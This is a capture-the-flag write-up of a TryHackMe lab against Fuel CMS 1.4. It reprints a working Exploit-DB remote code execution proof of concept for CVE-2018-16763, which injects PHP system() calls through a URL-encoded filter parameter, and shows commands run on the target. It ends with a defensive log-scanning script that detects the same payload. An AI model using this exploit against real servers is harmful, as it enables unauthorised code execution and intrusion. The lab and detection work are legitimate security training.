Vulnerability Capstone [TryHackMe]
Here we are going to leverage the skills which you might have learned within the Vulnerability Research module.
Task:
“Ackme Support Incorporated has recently set up a new blog. Their developer team have asked for a security audit to be performed before they create and publish articles to the public. It is your task to perform a security audit on the blog; looking for and abusing any vulnerabilities that you find.”
Let’s Do It!
My target box was @ 10.10.179.174.
Navigating to the page, we see the application's default landing page, which greets us with “Welcome to Fuel CMS Version 1.4”.
Let’s answer some questions:
What is the name of the application running on the vulnerable machine?
Fuel CMS
What is the version number of this application?
1.4
Alright, so far so good… with the application name and version disclosed we can go digging for existing vulnerabilities in this application… Bingo:
Google Search:
fuel CMS 1.4.1 - Remote Code Execution (1) - Exploit Database (https://www.exploit-db.com/exploits)
Jul 19, 2019 — fuel CMS 1.4.1 - Remote Code Execution (1). CVE-2018-16763. webapps exploit for Linux platform.
Fuel CMS 1.4.1 - Remote Code Execution (2) - Exploit Database (https://www.exploit-db.com/exploits)
Jan 28, 2021 — Fuel CMS 1.4.1 - Remote Code Execution (2). CVE-2018-16763. webapps exploit for PHP platform.
We can answer another question:
What is the number of the CVE that allows an attacker to remotely execute code on this application?
CVE-2018-16763
I decided to go with the following PoC code at https://www.exploit-db.com/exploits/47138. Here is the code:
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
# Note: this PoC is written for Python 2 (raw_input, print statement, urllib.quote)
# and sends every request through a local proxy on 127.0.0.1:8080.

import requests
import urllib

url = "http://127.0.0.1:8881"


def find_nth_overlapping(haystack, needle, n):
    # Return the index of the n-th occurrence of needle in haystack (overlaps allowed), or -1.
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = raw_input('cmd:')
    # The filter parameter carries a URL-encoded PHP snippet that evaluates the supplied command.
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    # The command output is echoed before the page body, so it is cut off at the
    # second occurrence of the first 20 characters of the response.
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print r.text[0:dup]
This code does require some adjustments for it to work for us. I went ahead and made the adjustments; you can snag the code from my GitHub: https://github.com/ManuelBerrueta/SecLabs/blob/master/TryHackMe/Jr_Pentester_Path/Vulnerability_Capstone/CVE-2018-16763.py
To run it, just run: python CVE-2018-16763.py --url http://[Target_IP]/
Once we are within the cmd> loop we can run commands and search through the request response for the output. I found the output to be after the first </div> tag:
cmd>ls
----snipped for space saving----
</div>README.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt
----snipped for space saving----
After some looking around, I found a flag.txt file in /home/ubuntu/:
cmd>cat /home/ubuntu/flag.txt
----snipped for space saving----
</div>THM{A****_****_*****D}
----snipped for space saving----
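From the defender's side, the request the PoC above sends is easy to spot in web-server access logs: the filter parameter of /fuel/pages/select/ should never contain PHP variable assignments, function calls, or quote-breakout concatenation. The following is an added example, not part of this write-up or of the Exploit-DB PoC, that decodes the filter parameter from constructed Apache-style log lines and reports a hit only when at least two independent signals agree, so a benign value such as "Sales (2019)" that merely contains parentheses is not flagged. The log lines, IP addresses and timestamps are constructed for the example; the request path and the encoded payload are the ones shown in the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache-style, not from any real server).
# Line 1 carries the same URL-encoded filter payload the PoC sends (command "ls");
# line 4 is a different injected PHP expression; the rest are benign requests,
# including a filter value with parentheses that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2019:10:01:02 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27 HTTP/1.1" 200 5123
10.0.0.6 - - [19/Jul/2019:10:01:05 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 2048
10.0.0.7 - - [19/Jul/2019:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 1024
10.0.0.8 - - [19/Jul/2019:10:02:31 +0000] "GET /fuel/pages/select/?filter=%27.phpinfo().%27 HTTP/1.1" 200 9000
10.0.0.9 - - [19/Jul/2019:10:03:00 +0000] "GET /fuel/pages/select/?filter=Sales+%282019%29 HTTP/1.1" 200 1800
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signals a legitimate page filter never needs. Each is noisy on its own
# (parentheses appear in normal titles), so hits require MIN_SIGNALS of them.
SUSPICIOUS = [
    (re.compile(r"\$\w+\s*="), "php variable assignment"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\b", re.I),
     "exec/eval builtin"),
    (re.compile(r"\w+\s*\("), "function-call syntax"),
    (re.compile(r"'\s*[.+]"), "quote breakout with concatenation"),
]
MIN_SIGNALS = 2


def decode_filter(target):
    """Return the percent-decoded 'filter' query value of a /fuel/pages/select request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query).get("filter")
    return values[0] if values else None


def inspect_line(line):
    """Return (ip, decoded_filter, [reasons]) when the line looks like an injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    filt = decode_filter(m.group("target"))
    if filt is None:
        return None
    reasons = [label for rx, label in SUSPICIOUS if rx.search(filt)]
    if len(reasons) < MIN_SIGNALS:
        return None
    return (m.group("ip"), filt, reasons)


def scan(log_text):
    """Scan a whole log and return the list of hits in file order."""
    return [hit for hit in (inspect_line(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, filt, reasons in scan(SAMPLE_LOG):
        print(f"{ip}: filter={filt!r} -> {', '.join(reasons)}")
```

Run it as-is to see the two injected requests reported with their decoded filter values; point `scan()` at a real access log to use it on live data. Decoding before matching matters: the PoC percent-encodes the entire payload, so a signature written against the raw request line would miss trivial re-encodings.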